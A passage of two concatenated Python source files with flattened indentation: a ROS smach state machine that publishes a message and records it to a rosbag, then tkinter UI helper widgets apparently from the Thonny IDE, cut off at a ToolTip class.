callback = userdata.callback
else:
callback = ''
# Get frame_id if it's specified as an input key
if 'frame_id' in self._input_keys:
frame_id = userdata.frame_id
else:
frame_id = ''
# Start the publisher
outcome = self._msg_publisher.start(published_msg, topic, rate, frame_id=frame_id, callback=callback)
elif self._action == 'stop':
outcome = self._msg_publisher.stop(topic)
elif self._action == 'stop_all':
outcome = self._msg_publisher.stop_all()
# Set topic output key if specified
if self._action == 'start' and outcome == 'succeeded':
for output_key in ['topic', 'output_topic', 'topic_output']:
if output_key in self._output_keys:
setattr(userdata, output_key, topic)
# Set msg output key if specified
if self._action == 'start' and outcome == 'succeeded':
for output_key in ['msg', 'output_msg', 'msg_output']:
if output_key in self._output_keys:
setattr(userdata, output_key, published_msg)
return outcome
class ROSBagAPIThreadRecorder(object):
"""A rosbag recorder class that uses the rosbag API (application
programming interface) as well as the threading library in order to manage
multiple recording threads. NOTE: this means that this recorder may have
issues with the Python GIL (global interpreter lock) when other threads (e.g.
MoveIt! commands) block execution.
"""
def __init__(self):
# Get a reference to the ROS master
self._master = rosgraph.Master('rosbag_recorder_observer')
# A dict of bag master check threads indexed by bag filenames
self._master_check_threads = dict()
# The rate at which to poll the ROS master for new topics
self._master_check_interval = 0.1
# A dict of rosbags indexed by filenames
self._bags = dict()
# A dict of bag writing threads indexed by bag filenames
self._write_threads = dict()
# A dict of bag writing queues indexed by bag filenames
self._write_queues = dict()
# A dict of bag writing stop flags indexed by bag filenames
self._stop_flags = dict()
# A dict of bag thread stop conditions indexed by bag filenames
self._stop_conditions = dict()
# A dict of bag file locks indexed by bag filenames
self._bag_locks = dict()
# A dict of dicts of subscribers indexed by bag_files and topics
# respectively
self._bag_subs = dict()
# Length of timeout (in seconds), as well as sleep rate, for waiting
# for the threads to finish writing before forcibly closing a bag.
self._bag_close_timeout = 10.0
self._bag_close_sleep_rate = 100.0
def _write_cb(self, msg, args):
bag_file = args[0]
topic = args[1]
msg_class = args[2]
try:
self._write_queues[bag_file].put((topic, msg, rospy.get_rostime()))
except Exception as e:
rospy.logwarn('Failed to write message of type {} from topic {} to rosbag {}: {}'.format(msg_class, topic, bag_file, repr(e)))
pass
def _run_master_check_thread(self, bag_file, topics):
# Set up an observer loop
try:
while not self._stop_flags[bag_file]:
# Get a list of topics currently being published
currently_published_topics = []
try:
currently_published_topics = self._master.getPublishedTopics('')
except Exception as e:
# TODO: Allow this warning to be included if a
# debug/verbosity flag is passed to the state.
# rospy.logwarn('Failed to get list of currently published topics from ROS master: {}'.format(repr(e)))
pass
# Check for new topics
for topic, msg_type in currently_published_topics:
# If the topic has previously been subscribed to for this
# bag_file, or is not listed as a topic for this bag_file,
# skip it.
if topic in list(self._bag_subs[bag_file].keys()) or (topic not in topics and topic.strip('/') not in topics):
continue
# Subscribe to the topic
try:
msg_class = roslib.message.get_message_class(msg_type)
self._bag_subs[bag_file][topic] = rospy.Subscriber(topic, msg_class, self._write_cb, (bag_file, topic, msg_class))
except Exception as e:
self._unsubscribe_bag_topics(bag_file)
self._close_bag(bag_file)
raise ValueError('Failed to subscribe to topic {}: {}'.format(topic, repr(e)))
# Wait a while
self._stop_conditions[bag_file].acquire()
self._stop_conditions[bag_file].wait(self._master_check_interval)
except Exception as e:
rospy.logerr('Error when recording rosbag file {}: {}'.format(bag_file, repr(e)))
# Unsubscribe from topics and close bag
self._unsubscribe_bag_topics(bag_file)
self._close_bag(bag_file)
def _unsubscribe_bag_topics(self, bag_file):
for _, sub in self._bag_subs[bag_file].items():
try:
sub.unregister()
except Exception as e:
rospy.logerr('Failed to unregister topic subscriber {} while stopping rosbag recording with filename \'{}\': {}'.format(sub, bag_file, repr(e)))
raise
del self._bag_subs[bag_file]
def _close_bag(self, bag_file):
try:
with self._bag_locks[bag_file]:
self._bags[bag_file].close()
except Exception as e:
rospy.logerr('Failed to close rosbag with filename \'{}\': {}'.format(bag_file, repr(e)))
raise
del self._bags[bag_file]
def _run_write_thread(self, bag_file):
try:
while not self._stop_flags[bag_file]:
# Wait for a message
item = self._write_queues[bag_file].get()
if item == self:
continue
topic, msg, t = item
# Write to the bag
with self._bag_locks[bag_file]:
self._bags[bag_file].write(topic, msg, t)
except Exception as e:
rospy.logerr('Error when writing to rosbag file {}: {}'.format(bag_file, repr(e)))
def start(self, bag_file, topics):
"""Start a rosbag recording.
"""
# Open the bag file for writing
try:
assert(bag_file not in self._bags.keys())
self._bags[bag_file] = rosbag.Bag(bag_file, 'w')
self._bag_subs[bag_file] = dict()
except Exception as e:
rospy.logerr('Failed to start rosbag recording with filename \'{}\': {}'.format(bag_file, repr(e)))
return 'aborted'
# Set up the bag writing queue
self._write_queues[bag_file] = Queue()
# Set the bag thread lock, write stopping flag, and thread stopping conditions
self._bag_locks[bag_file] = threading.Lock()
self._stop_flags[bag_file] = False
self._stop_conditions[bag_file] = threading.Condition()
# Spin up the master check and bag writing threads
self._master_check_threads[bag_file] = threading.Thread(target=self._run_master_check_thread, args=[bag_file, topics])
self._write_threads[bag_file] = threading.Thread(target=self._run_write_thread, args=[bag_file])
self._master_check_threads[bag_file].start()
self._write_threads[bag_file].start()
return 'succeeded'
def stop(self, bag_file):
"""Stop a rosbag recording.
"""
# Signal threads to stop bag recording
with self._stop_conditions[bag_file]:
self._stop_flags[bag_file] = True
self._stop_conditions[bag_file].notify_all()
# Signal the bag write thread to stop writing
self._write_queues[bag_file].put(self)
# Wait for the bag to be closed
t = rospy.get_time()
r = rospy.Rate(self._bag_close_sleep_rate)
while bag_file in list(self._bags.keys()):
if rospy.get_time() - t < self._bag_close_timeout:
r.sleep()
else:
break
else:
return 'succeeded'
# If the bag is still open, issue a warning and attempt forced closure.
rospy.logwarn('Warning: timeout exceeded for stopping writing to rosbag file {}. Attempting forced stop...'.format(bag_file))
try:
self._unsubscribe_bag_topics(bag_file)
self._close_bag(bag_file)
except Exception as e:
rospy.logerr('Error during forced stop of writing to rosbag file {}: {}'.format(bag_file, repr(e)))
return 'aborted'
return 'succeeded'
def stop_all(self):
"""Stop all rosbag recordings.
"""
# Stop all current recordings
for bag_file in list(self._bags.keys()):
if self.stop(bag_file) != 'succeeded':
return 'aborted'
return 'succeeded'
class RecordROSBagState(smach.State):
def __init__(self, name, bag_recorder, action, input_keys=['file', 'topics'], output_keys=[], callbacks = None):
smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=['succeeded', 'aborted'])
# Save the state name
self._name = name
# Save the ROSBagRecorder object reference
self._bag_recorder= bag_recorder
# Save the action
self._action = action
self._cbs = []
if callbacks:
for cb in sorted(callbacks):
if cb in globals():
self._cbs.append(globals()[cb])
elif cb in locals():
self._cbs.append(locals()[cb])
elif cb in dir(self):
self._cbs.append(getattr(self, cb))
self._cb_input_keys = []
self._cb_output_keys = []
self._cb_outcomes = []
for cb in self._cbs:
if cb and smach.has_smach_interface(cb):
self._cb_input_keys.append(cb.get_registered_input_keys())
self._cb_output_keys.append(cb.get_registered_output_keys())
self._cb_outcomes.append(cb.get_registered_outcomes())
self.register_input_keys(self._cb_input_keys[-1])
self.register_output_keys(self._cb_output_keys[-1])
self.register_outcomes(self._cb_outcomes[-1])
def execute(self, userdata):
# Call callbacks
for (cb, ik, ok) in zip(self._cbs,
self._cb_input_keys,
self._cb_output_keys):
# Call callback with limited userdata
try:
cb_outcome = cb(self, smach.Remapper(userdata,ik,ok,{}))
except:
cb_outcome = cb(smach.Remapper(userdata,ik,ok,{}))
# Get filename from userdata
try:
bag_file = userdata.file
assert(isinstance(bag_file, str))
except Exception as e:
rospy.logerr('The rosbag filename must be specified as a userdata input key: {}'.format(repr(e)))
return 'aborted'
# Get topic names from userdata
try:
topics = userdata.topics
assert(not any(not isinstance(x, str) for x in topics))
except Exception as e:
rospy.logerr('Topic names must be specified as a userdata input key: {}'.format(repr(e)))
return 'aborted'
# Start or stop recording
outcome = 'aborted'
if self._action == 'start' or self._action == 'record':
outcome = self._bag_recorder.start(bag_file, topics)
elif self._action == 'stop':
outcome = self._bag_recorder.stop(bag_file)
elif self._action == 'stop_all':
outcome = self._bag_recorder.stop_all()
return outcome
class SleepState(smach.State):
def __init__(self, time, input_keys = [], output_keys = [], callbacks = [], outcomes=['succeeded']):
smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=outcomes)
self._time = time
def execute(self, userdata):
rospy.sleep(self._time)
return 'succeeded'
def main():
rospy.init_node('sm')
msg_publisher = MsgPublisher()
bag_recorder = ROSBagAPIThreadRecorder()
sm = smach.StateMachine(outcomes=['succeeded', 'aborted'])
sm.userdata.rate = 100.0
sm.userdata.file = ''
sm.userdata.topics = ''
sm.userdata.rate = 100.0
sm.userdata.topic = ''
sm.userdata.point = Point()
sm.userdata.rate = 100.0
sm.userdata.topic = 'smacha/rosbag_api_recording_1_point'
sm.userdata.file = '/tmp/rosbag_api_recording_1.bag'
sm.userdata.topics = ['smacha/rosbag_api_recording_1_point']
with sm:
smach.StateMachine.add('PUBLISH_MSG',
PublishMsgState('PUBLISH_MSG', msg_publisher, 'start'),
transitions={'aborted':'aborted',
'succeeded':'START_RECORDING'},
remapping={'msg':'point',
'rate':'rate',
'topic':'topic'})
smach.StateMachine.add('START_RECORDING',
RecordROSBagState('START_RECORDING', bag_recorder, 'start'),
transitions={'aborted':'aborted',
'succeeded':'WAIT'},
remapping={'file':'file',
'topics':'topics'})
smach.StateMachine.add('WAIT',
SleepState(5),
transitions={'succeeded':'STOP_RECORDING'})
smach.StateMachine.add('STOP_RECORDING',
RecordROSBagState('STOP_RECORDING', bag_recorder, 'stop_all'),
transitions={'aborted':'aborted',
'succeeded':'UNPUBLISH_MSG'})
smach.StateMachine.add('UNPUBLISH_MSG',
PublishMsgState('UNPUBLISH_MSG', msg_publisher, 'stop_all'),
transitions={'aborted':'aborted',
'succeeded':'succeeded'})
outcome = sm.execute()
if __name__ == '__main__':
main()
|
ui_utils.py
|
# -*- coding: utf-8 -*-
import collections
import logging
import os
import platform
import re
import shutil
import signal
import subprocess
import textwrap
import threading
import time
import tkinter as tk
import tkinter.font
import traceback
from tkinter import filedialog, messagebox, ttk
from typing import Callable, List, Optional, Tuple, Union # @UnusedImport
from thonny import get_workbench, misc_utils, tktextext
from thonny.common import TextRange
from thonny.misc_utils import running_on_linux, running_on_mac_os, running_on_windows
from thonny.tktextext import TweakableText
import sys
from _tkinter import TclError
import webbrowser
# i18n #
import gettext
gettext.install('thonny', os.path.join(os.path.dirname(__file__), "locale"))
class CustomMenubar(ttk.Frame):
def __init__(self, master):
ttk.Frame.__init__(self, master, style="CustomMenubar.TFrame")
self._menus = []
self._opened_menu = None
ttk.Style().map(
"CustomMenubarLabel.TLabel",
background=[
("!active", lookup_style_option("Menubar", "background", "gray")),
("active", lookup_style_option("Menubar", "activebackground", "LightYellow")),
],
foreground=[
("!active", lookup_style_option("Menubar", "foreground", "black")),
("active", lookup_style_option("Menubar", "activeforeground", "black")),
],
)
def add_cascade(self, label, menu):
label_widget = ttk.Label(
self,
style="CustomMenubarLabel.TLabel",
text=label,
padding=[6, 3, 6, 2],
font="TkDefaultFont",
)
if len(self._menus) == 0:
padx = (6, 0)
else:
padx = 0
label_widget.grid(row=0, column=len(self._menus), padx=padx)
def enter(event):
label_widget.state(("active",))
# Don't know how to open this menu when another menu is open
# another tk_popup just doesn't work unless old menu is closed by click or Esc
# https://stackoverflow.com/questions/38081470/is-there-a-way-to-know-if-tkinter-optionmenu-dropdown-is-active
# unpost doesn't work in Win and Mac: https://www.tcl.tk/man/tcl8.5/TkCmd/menu.htm#M62
# print("ENTER", menu, self._opened_menu)
if self._opened_menu is not None:
self._opened_menu.unpost()
click(event)
def leave(event):
label_widget.state(("!active",))
def click(event):
try:
# print("Before")
self._opened_menu = menu
menu.tk_popup(
label_widget.winfo_rootx(),
label_widget.winfo_rooty() + label_widget.winfo_height(),
)
finally:
# print("After")
self._opened_menu = None
label_widget.bind("<Enter>", enter, True)
label_widget.bind("<Leave>", leave, True)
label_widget.bind("<1>", click, True)
self._menus.append(menu)
class AutomaticPanedWindow(tk.PanedWindow):
"""
Enables inserting panes according to their position_key-s.
Automatically adds/removes itself to/from its master AutomaticPanedWindow.
Fixes some style glitches.
"""
def __init__(self, master, position_key=None, preferred_size_in_pw=None, **kwargs):
tk.PanedWindow.__init__(self, master, **kwargs)
self._pane_minsize = 100
self.position_key = position_key
self._restoring_pane_sizes = False
self._last_window_size = (0, 0)
self._full_size_not_final = True
self._configure_binding = self.bind("<Configure>", self._on_window_resize, True)
self._update_appearance_binding = self.bind(
"<<ThemeChanged>>", self._update_appearance, True
)
self.bind("<B1-Motion>", self._on_mouse_dragged, True)
self._update_appearance()
# should be in the end, so that it can be detected when
# constructor hasn't completed yet
self.preferred_size_in_pw = preferred_size_in_pw
def insert(self, pos, child, **kw):
kw.setdefault("minsize", self._pane_minsize)
if pos == "auto":
# According to documentation I should use self.panes()
# but this doesn't return expected widgets
for sibling in sorted(
self.pane_widgets(),
key=lambda p: p.position_key if hasattr(p, "position_key") else 0,
):
if (
not hasattr(sibling, "position_key")
or sibling.position_key == None
or sibling.position_key > child.position_key
):
pos = sibling
break
else:
pos = "end"
if isinstance(pos, tk.Widget):
kw["before"] = pos
self.add(child, **kw)
def add(self, child, **kw):
kw.setdefault("minsize", self._pane_minsize)
tk.PanedWindow.add(self, child, **kw)
self._update_visibility()
self._check_restore_preferred_sizes()
def remove(self, child):
tk.PanedWindow.remove(self, child)
self._update_visibility()
self._check_restore_preferred_sizes()
def forget(self, child):
tk.PanedWindow.forget(self, child)
self._update_visibility()
self._check_restore_preferred_sizes()
def destroy(self):
self.unbind("<Configure>", self._configure_binding)
self.unbind("<<ThemeChanged>>", self._update_appearance_binding)
tk.PanedWindow.destroy(self)
def is_visible(self):
if not isinstance(self.master, AutomaticPanedWindow):
return self.winfo_ismapped()
else:
return self in self.master.pane_widgets()
def pane_widgets(self):
result = []
for pane in self.panes():
# pane is not the widget but some kind of reference object
assert not isinstance(pane, tk.Widget)
result.append(self.nametowidget(str(pane)))
return result
def _on_window_resize(self, event):
if event.width < 10 or event.height < 10:
return
window = self.winfo_toplevel()
window_size = (window.winfo_width(), window.winfo_height())
initializing = hasattr(window, "initializing") and window.initializing
if (
not initializing
and not self._restoring_pane_sizes
and (window_size != self._last_window_size or self._full_size_not_final)
):
self._check_restore_preferred_sizes()
self._last_window_size = window_size
def _on_mouse_dragged(self, event):
if event.widget == self and not self._restoring_pane_sizes:
self._update_preferred_sizes()
def _update_preferred_sizes(self):
for pane in self.pane_widgets():
if getattr(pane, "preferred_size_in_pw", None) is not None:
if self.cget("orient") == "horizontal":
current_size = pane.winfo_width()
else:
current_size = pane.winfo_height()
if current_size > 20:
pane.preferred_size_in_pw = current_size
# paneconfig width/height effectively puts
# unexplainable maxsize to some panes
# if self.cget("orient") == "horizontal":
# self.paneconfig(pane, width=current_size)
# else:
# self.paneconfig(pane, height=current_size)
#
# else:
# self.paneconfig(pane, width=1000, height=1000)
def _check_restore_preferred_sizes(self):
window = self.winfo_toplevel()
if getattr(window, "initializing", False):
return
try:
self._restoring_pane_sizes = True
self._restore_preferred_sizes()
finally:
self._restoring_pane_sizes = False
def _restore_preferred_sizes(self):
total_preferred_size = 0
panes_without_preferred_size = []
panes = self.pane_widgets()
for pane in panes:
if not hasattr(pane, "preferred_size_in_pw"):
# child isn't fully constructed yet
return
if pane.preferred_size_in_pw is None:
panes_without_preferred_size.append(pane)
# self.paneconfig(pane, width=1000, height=1000)
else:
total_preferred_size += pane.preferred_size_in_pw
# Without updating pane width/height attribute
# the preferred size may lose effect when squeezing
# non-preferred panes too small. Also zooming/unzooming
# changes the supposedly fixed panes ...
#
# but
# paneconfig width/height effectively puts
# unexplainable maxsize to some panes
# if self.cget("orient") == "horizontal":
# self.paneconfig(pane, width=pane.preferred_size_in_pw)
# else:
# self.paneconfig(pane, height=pane.preferred_size_in_pw)
assert len(panes_without_preferred_size) <= 1
size = self._get_size()
if size is None:
return
leftover_size = self._get_size() - total_preferred_size
used_size = 0
for i, pane in enumerate(panes[:-1]):
used_size += pane.preferred_size_in_pw or leftover_size
self._place_sash(i, used_size)
used_size += int(str(self.cget("sashwidth")))
def _get_size(self):
if self.cget("orient") == tk.HORIZONTAL:
result = self.winfo_width()
else:
result = self.winfo_height()
if result < 20:
# Not ready yet
return None
else:
return result
def _place_sash(self, i, distance):
if self.cget("orient") == tk.HORIZONTAL:
self.sash_place(i, distance, 0)
else:
self.sash_place(i, 0, distance)
def _update_visibility(self):
if not isinstance(self.master, AutomaticPanedWindow):
return
if len(self.panes()) == 0 and self.is_visible():
self.master.forget(self)
if len(self.panes()) > 0 and not self.is_visible():
self.master.insert("auto", self)
def _update_appearance(self, event=None):
self.configure(sashwidth=lookup_style_option("Sash", "sashthickness", 10))
self.configure(background=lookup_style_option("TPanedWindow", "background"))
class ClosableNotebook(ttk.Notebook):
def __init__(self, master, style="ButtonNotebook.TNotebook", **kw):
super().__init__(master, style=style, **kw)
self.tab_menu = self.create_tab_menu()
self._popup_index = None
self.pressed_index = None
self.bind("<ButtonPress-1>", self._letf_btn_press, True)
self.bind("<ButtonRelease-1>", self._left_btn_release, True)
if running_on_mac_os():
self.bind("<ButtonPress-2>", self._right_btn_press, True)
self.bind("<Control-Button-1>", self._right_btn_press, True)
else:
self.bind("<ButtonPress-3>", self._right_btn_press, True)
# self._check_update_style()
def create_tab_menu(self):
menu = tk.Menu(self.winfo_toplevel(), tearoff=False, **get_style_configuration("Menu"))
menu.add_command(label=_("Close"), command=self._close_tab_from_menu)
menu.add_command(label=_("Close others"), command=self._close_other_tabs)
menu.add_command(label=_("Close all"), command=self.close_tabs)
return menu
def _letf_btn_press(self, event):
try:
elem = self.identify(event.x, event.y)
index = self.index("@%d,%d" % (event.x, event.y))
if "closebutton" in elem:
self.state(["pressed"])
self.pressed_index = index
except Exception:
# may fail, if clicked outside of tab
return
def _left_btn_release(self, event):
if not self.instate(["pressed"]):
return
try:
elem = self.identify(event.x, event.y)
index = self.index("@%d,%d" % (event.x, event.y))
except Exception:
# may fail, when mouse is dragged
return
else:
if "closebutton" in elem and self.pressed_index == index:
self.close_tab(index)
self.state(["!pressed"])
finally:
self.pressed_index = None
def _right_btn_press(self, event):
try:
index = self.index("@%d,%d" % (event.x, event.y))
self._popup_index = index
self.tab_menu.tk_popup(*self.winfo_toplevel().winfo_pointerxy())
except Exception:
logging.exception("Opening tab menu")
def _close_tab_from_menu(self):
self.close_tab(self._popup_index)
def _close_other_tabs(self):
self.close_tabs(self._popup_index)
def close_tabs(self, except_index=None):
for tab_index in reversed(range(len(self.winfo_children()))):
if except_index is not None and tab_index == except_index:
continue
else:
self.close_tab(tab_index)
def close_tab(self, index):
child = self.get_child_by_index(index)
if hasattr(child, "close"):
child.close()
else:
self.forget(index)
child.destroy()
def get_child_by_index(self, index):
tab_id = self.tabs()[index]
if tab_id:
return self.nametowidget(tab_id)
else:
return None
def get_current_child(self):
child_id = self.select()
if child_id:
return self.nametowidget(child_id)
else:
return None
def focus_set(self):
editor = self.get_current_child()
if editor:
editor.focus_set()
else:
super().focus_set()
def _check_update_style(self):
style = ttk.Style()
if "closebutton" in style.element_names():
# It's done already
return
# respect if required images have been defined already
if "img_close" not in self.image_names():
img_dir = os.path.join(os.path.dirname(__file__), "res")
ClosableNotebook._close_img = tk.PhotoImage(
"img_tab_close", file=os.path.join(img_dir, "tab_close.gif")
)
ClosableNotebook._close_active_img = tk.PhotoImage(
"img_tab_close_active", file=os.path.join(img_dir, "tab_close_active.gif")
)
style.element_create(
"closebutton",
"image",
"img_tab_close",
("active", "pressed", "!disabled", "img_tab_close_active"),
("active", "!disabled", "img_tab_close_active"),
border=8,
sticky="",
)
style.layout(
"ButtonNotebook.TNotebook.Tab",
[
(
"Notebook.tab",
{
"sticky": "nswe",
"children": [
(
"Notebook.padding",
{
"side": "top",
"sticky": "nswe",
"children": [
(
"Notebook.focus",
{
"side": "top",
"sticky": "nswe",
"children": [
(
"Notebook.label",
{"side": "left", "sticky": ""},
),
(
"Notebook.closebutton",
{"side": "left", "sticky": ""},
),
],
},
)
],
},
)
],
},
)
],
)
def _check_remove_padding(self, kw):
# Windows themes produce 1-pixel padding to the bottom of the pane
# Don't know how to get rid of it using themes
if "padding" not in kw and ttk.Style().theme_use().lower() in (
"windows",
"xpnative",
"vista",
):
kw["padding"] = (0, 0, 0, -1)
def add(self, child, **kw):
self._check_remove_padding(kw)
super().add(child, **kw)
def insert(self, pos, child, **kw):
self._check_remove_padding(kw)
super().insert(pos, child, **kw)
class AutomaticNotebook(ClosableNotebook):
"""
Enables inserting views according to their position keys.
Remember its own position key. Automatically updates its visibility.
"""
def __init__(self, master, position_key, preferred_size_in_pw=None):
if get_workbench().in_simple_mode():
style = "TNotebook"
else:
style = "ButtonNotebook.TNotebook"
super().__init__(master, style=style, padding=0)
self.position_key = position_key
# should be in the end, so that it can be detected when
# constructor hasn't completed yet
self.preferred_size_in_pw = preferred_size_in_pw
def add(self, child, **kw):
super().add(child, **kw)
self._update_visibility()
def insert(self, pos, child, **kw):
if pos == "auto":
for sibling in map(self.nametowidget, self.tabs()):
if (
not hasattr(sibling, "position_key")
or sibling.position_key == None
or sibling.position_key > child.position_key
):
pos = sibling
break
else:
pos = "end"
super().insert(pos, child, **kw)
self._update_visibility()
def hide(self, tab_id):
super().hide(tab_id)
self._update_visibility()
def forget(self, tab_id):
if tab_id in self.tabs() or tab_id in self.winfo_children():
super().forget(tab_id)
self._update_visibility()
def is_visible(self):
return self in self.master.pane_widgets()
def get_visible_child(self):
for child in self.winfo_children():
if str(child) == str(self.select()):
return child
return None
def _update_visibility(self):
if not isinstance(self.master, AutomaticPanedWindow):
return
if len(self.tabs()) == 0 and self.is_visible():
self.master.remove(self)
if len(self.tabs()) > 0 and not self.is_visible():
self.master.insert("auto", self)
class TreeFrame(ttk.Frame):
def __init__(
self,
master,
columns,
displaycolumns="#all",
show_scrollbar=True,
borderwidth=0,
relief="flat",
**tree_kw,
):
ttk.Frame.__init__(self, master, borderwidth=borderwidth, relief=relief)
# http://wiki.tcl.tk/44444#pagetoc50f90d9a
self.vert_scrollbar = ttk.Scrollbar(
self, orient=tk.VERTICAL, style=scrollbar_style("Vertical")
)
if show_scrollbar:
self.vert_scrollbar.grid(row=0, column=1, sticky=tk.NSEW)
self.tree = ttk.Treeview(
self,
columns=columns,
displaycolumns=displaycolumns,
yscrollcommand=self.vert_scrollbar.set,
**tree_kw,
)
self.tree["show"] = "headings"
self.tree.grid(row=0, column=0, sticky=tk.NSEW)
self.vert_scrollbar["command"] = self.tree.yview
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.tree.bind("<<TreeviewSelect>>", self.on_select, "+")
self.tree.bind("<Double-Button-1>", self.on_double_click, "+")
def _clear_tree(self):
for child_id in self.tree.get_children():
self.tree.delete(child_id)
def clear(self):
self._clear_tree()
def on_select(self, event):
pass
def on_double_click(self, event):
pass
def scrollbar_style(orientation):
# In mac ttk.Scrollbar uses native rendering unless style attribute is set
# see http://wiki.tcl.tk/44444#pagetoc50f90d9a
# Native rendering doesn't look good in dark themes
if running_on_mac_os() and get_workbench().uses_dark_ui_theme():
return orientation + ".TScrollbar"
else:
return None
def sequence_to_accelerator(sequence):
"""Translates Tk event sequence to customary shortcut string
for showing in the menu"""
if not sequence:
return ""
if not sequence.startswith("<"):
return sequence
accelerator = (
sequence.strip("<>").replace("Key-", "").replace("KeyPress-", "").replace("Control", "Ctrl")
)
# Tweaking individual parts
parts = accelerator.split("-")
# tkinter shows shift with capital letter, but in shortcuts it's customary to include it explicitly
if len(parts[-1]) == 1 and parts[-1].isupper() and not "Shift" in parts:
parts.insert(-1, "Shift")
# even when shift is not required, it's customary to show shortcut with capital letter
if len(parts[-1]) == 1:
parts[-1] = parts[-1].upper()
accelerator = "+".join(parts)
# Post processing
accelerator = (
accelerator.replace("Minus", "-")
.replace("minus", "-")
.replace("Plus", "+")
.replace("plus", "+")
)
return accelerator
def get_zoomed(toplevel):
if "-zoomed" in toplevel.wm_attributes(): # Linux
return bool(toplevel.wm_attributes("-zoomed"))
else: # Win/Mac
return toplevel.wm_state() == "zoomed"
def set_zoomed(toplevel, value):
if "-zoomed" in toplevel.wm_attributes(): # Linux
toplevel.wm_attributes("-zoomed", str(int(value)))
else: # Win/Mac
if value:
toplevel.wm_state("zoomed")
else:
toplevel.wm_state("normal")
class EnhancedTextWithLogging(tktextext.EnhancedText):
def direct_insert(self, index, chars, tags=None, **kw):
try:
# try removing line numbers
# TODO: shouldn't it take place only on paste?
# TODO: does it occur when opening a file with line numbers in it?
# if self._propose_remove_line_numbers and isinstance(chars, str):
# chars = try_remove_linenumbers(chars, self)
concrete_index = self.index(index)
return tktextext.EnhancedText.direct_insert(self, index, chars, tags=tags, **kw)
finally:
get_workbench().event_generate(
"TextInsert", index=concrete_index, text=chars, tags=tags, text_widget=self
)
def direct_delete(self, index1, index2=None, **kw):
try:
# index1 may be eg "sel.first" and it doesn't make sense *after* deletion
concrete_index1 = self.index(index1)
if index2 is not None:
concrete_index2 = self.index(index2)
else:
concrete_index2 = None
return tktextext.EnhancedText.direct_delete(self, index1, index2=index2, **kw)
finally:
get_workbench().event_generate(
"TextDelete", index1=concrete_index1, index2=concrete_index2, text_widget=self
)
class SafeScrollbar(ttk.Scrollbar):
def __init__(self, master=None, **kw):
super().__init__(master=master, **kw)
def set(self, first, last):
try:
ttk.Scrollbar.set(self, first, last)
except Exception:
traceback.print_exc()
class AutoScrollbar(SafeScrollbar):
# http://effbot.org/zone/tkinter-autoscrollbar.htm
# a vert_scrollbar that hides itself if it's not needed. only
# works if you use the grid geometry manager.
def __init__(self, master=None, **kw):
super().__init__(master=master, **kw)
def set(self, first, last):
if float(first) <= 0.0 and float(last) >= 1.0:
self.grid_remove()
elif float(first) > 0.001 or float(last) < 0.009:
# with >0 and <1 it occasionally made scrollbar wobble back and forth
self.grid()
ttk.Scrollbar.set(self, first, last)
def pack(self, **kw):
raise tk.TclError(_("cannot use pack with this widget"))
def place(self, **kw):
raise tk.TclError(_("cannot use place with this widget"))
def update_entry_text(entry, text):
original_state = entry.cget("state")
entry.config(state="normal")
entry.delete(0, "end")
entry.insert(0, text)
entry.config(state=original_state)
class VerticallyScrollableFrame(ttk.Frame):
# http://tkinter.unpythonic.net/wiki/VerticalScrolledFrame
def __init__(self, master):
ttk.Frame.__init__(self, master)
# set up scrolling with canvas
vscrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)
self.canvas = tk.Canvas(self, bd=0, highlightthickness=0, yscrollcommand=vscrollbar.set)
vscrollbar.config(command=self.canvas.yview)
self.canvas.xview_moveto(0)
self.canvas.yview_moveto(0)
self.canvas.grid(row=0, column=0, sticky=tk.NSEW)
vscrollbar.grid(row=0, column=1, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.interior = ttk.Frame(self.canvas)
self.interior_id = self.canvas.create_window(0, 0, window=self.interior, anchor=tk.NW)
self.bind("<Configure>", self._configure_interior, "+")
self.bind("<Expose>", self._expose, "+")
def _expose(self, event):
self.update_idletasks()
self.update_scrollbars()
def _configure_interior(self, event):
self.update_scrollbars()
def update_scrollbars(self):
# update the scrollbars to match the size of the inner frame
size = (self.canvas.winfo_width(), self.interior.winfo_reqheight())
self.canvas.config(scrollregion="0 0 %s %s" % size)
if (
self.interior.winfo_reqwidth() != self.canvas.winfo_width()
and self.canvas.winfo_width() > 10
):
# update the interior's width to fit canvas
# print("CAWI", self.canvas.winfo_width())
self.canvas.itemconfigure(self.interior_id, width=self.canvas.winfo_width())
class ScrollableFrame(ttk.Frame):
# http://tkinter.unpythonic.net/wiki/VerticalScrolledFrame
def __init__(self, master):
ttk.Frame.__init__(self, master)
# set up scrolling with canvas
vscrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)
hscrollbar = ttk.Scrollbar(self, orient=tk.HORIZONTAL)
self.canvas = tk.Canvas(self, bd=0, highlightthickness=0, yscrollcommand=vscrollbar.set)
vscrollbar.config(command=self.canvas.yview)
hscrollbar.config(command=self.canvas.xview)
self.canvas.xview_moveto(0)
self.canvas.yview_moveto(0)
self.canvas.grid(row=0, column=0, sticky=tk.NSEW)
vscrollbar.grid(row=0, column=1, sticky=tk.NSEW)
hscrollbar.grid(row=1, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.interior = ttk.Frame(self.canvas)
self.interior.columnconfigure(0, weight=1)
self.interior.rowconfigure(0, weight=1)
self.interior_id = self.canvas.create_window(0, 0, window=self.interior, anchor=tk.NW)
self.bind("<Configure>", self._configure_interior, "+")
self.bind("<Expose>", self._expose, "+")
def _expose(self, event):
self.update_idletasks()
self._configure_interior(event)
def _configure_interior(self, event):
# update the scrollbars to match the size of the inner frame
size = (self.canvas.winfo_reqwidth(), self.interior.winfo_reqheight())
self.canvas.config(scrollregion="0 0 %s %s" % size)
class ThemedListbox(tk.Listbox):
def __init__(self, master=None, cnf={}, **kw):
super().__init__(master=master, cnf=cnf, **kw)
self._ui_theme_change_binding = self.bind(
"<<ThemeChanged>>", self._reload_theme_options, True
)
self._reload_theme_options()
def _reload_theme_options(self, event=None):
style = ttk.Style()
states = []
if self["state"] == "disabled":
states.append("disabled")
# Following crashes when a combobox is focused
# if self.focus_get() == self:
# states.append("focus")
opts = {}
for key in [
"background",
"foreground",
"highlightthickness",
"highlightcolor",
"highlightbackground",
]:
value = style.lookup(self.get_style_name(), key, states)
if value:
opts[key] = value
self.configure(opts)
def get_style_name(self):
return "Listbox"
def destroy(self):
self.unbind("<<ThemeChanged>>", self._ui_theme_change_binding)
super().destroy()
class ToolTip:
